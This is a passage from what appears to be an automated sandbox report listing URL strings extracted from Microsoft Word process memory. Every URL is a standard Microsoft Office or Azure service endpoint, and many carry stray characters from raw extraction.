Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizep
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizepE
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeqF
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizerGl
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizesHm
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizete
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizex
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizey
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeza
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://management.azure.com
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://management.azure.com/
Source: WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.418070806.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571431149.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmpString found in binary or memory: https://management.azure.com/t
Source: WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://messaging.office.com/
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://metadata.templates.cdn.office.net/client/logA?V
Source: WINWORD.EXE, 00000001.00000002.569040396.000000000CF4F000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://ncus.contentsync.
Source: WINWORD.EXE, 00000001.00000002.569111011.000000000CFC2000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://ncus.pagecontentsync.
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/
Source: WINWORD.EXE, 00000001.00000003.292298314.00000000109B6000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules
Source: WINWORD.EXE, 00000001.00000002.569466950.000000000D0A4000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?Application=winword.exe&Version=16.0.4954.1000&ClientI
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.netvK
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://officeapps.live.com
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com%
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com-
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com0a
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com3
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com5
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com9
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com?
Source: WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comA
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comG
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comLMEM8
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comM
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comO
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comS
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comW
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comXW
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comY
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comc
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comender
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comi
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comion.dll
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.como
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comocal
Source: WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comop.ini
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comq
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comu
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://officeci.azurewebsites.net/api/A?V
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksz
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: WINWORD.EXE, 00000001.00000003.291956486.0000000010ACF000.00000004.00000001.sdmpString found in binary or memory: https://ofxus.officeapps.live.com/
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
